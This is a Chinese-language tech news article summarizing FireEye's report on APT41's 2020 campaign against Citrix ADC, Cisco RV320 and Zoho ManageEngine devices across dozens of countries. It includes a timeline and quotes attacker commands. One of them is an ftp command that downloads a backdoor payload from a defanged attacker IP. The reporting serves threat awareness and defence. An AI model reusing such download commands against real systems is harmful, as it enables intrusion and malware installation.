2020-03-30 11:55:00 黑客視界

美国网络安全巨头FireEye于近日发文称，被他们判定来自中国的黑客组织APT41从今年年初开始发起了自该组织成立以来规模最大的入侵活动，波及澳大利亚、加拿大、丹麦、芬兰、法国、印度、意大利、日本、马来西亚、墨西哥、菲律宾、波兰、卡塔尔、沙特阿拉伯、新加坡、瑞典、瑞士、阿联酋、英国以及美国等数十个国家。

FireEye在文章中指出，在1月20日至3月11日期间，APT41利用Citrix NetScaler/ADC、思科路由器以及Zoho ManageEngine Desktop Central中的漏洞攻击了分属银行/金融、建筑、国防、政府、医疗、高科技、高等教育、法律、制造业、媒体、非营利、石油和天然气、石化、制药、房地产、电信、运输、旅行以及软件等众多行业的组织，其中有超过75家是FireEye的客户。

为了证实其说法的真实性，FireEye在文章中还公布了他们针对这起入侵活动的调查成果。接下来，就让我们一起来看看吧。

CVE-2019-19781（Citrix ADC漏洞）利用活动

FireEye表示，APT41从1月20日开始试图利用CVE-2019-19781（于2019年12月17日被公开披露）入侵Citrix Application Delivery Controller（ADC）和Citrix Gateway设备。

图1.FireEye整理的关键事件时间表

1月20日和1月21日的CVE-2019-19781漏洞利用活动涉及到执行命令“file /bin/pwd”，这可以帮助APT41实现两个目标：一是能够确认系统是否已安装补丁，进而判断设备是否能够被入侵；二是能够获取到与系统体系结构相关的信息（据称，这是为了给后续部署后门做准备）。

图2.CVE-2019-19781漏洞利用HTTP流量示例（1月20日和1月21日）

1月23至2月1日，漏洞利用活动出现了短暂的中断。FireEye认为，这很可能与1月24日至1月30期间的中国农历新年假期有关。

从2月1日开始，APT41开始执行命令“/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd”，以下载被命名为“bsd”的有效载荷（被FireEye怀疑是一种新后门）。

图3.CVE-2019-19781漏洞利用HTTP流量示例（2月1日）

2月2日至2月19日，漏洞利用活动再次中断。FireEye认为，这很可能与中国爆发的新型肺炎疫情有关。

2月24日和2月25日，针对CVE-2019-19781的漏洞利用明显增加，且利用行为几乎与2月1日的活动几乎完全一致，仅仅是将有效载荷的名称更改为了“un”。

图4. CVE-2019-19781漏洞利用HTTP流量示例（2月24日和2月25日）

思科路由器漏洞利用活动

FireEye表示，APT41在2月21日成功利用漏洞侵入了一家电信组织的Cisco RV320路由器，并下载了名为“fuc”的有效载荷。尽管尚不清楚利用的是哪些漏洞，但可以的是，其中一个模块结合利用了CVE-2019-1653和CVE-2019-1652，这允许攻击者在Cisco RV320和RV325小型企业路由器上实现远程代码执行，并使用wget下载指定的有效载荷。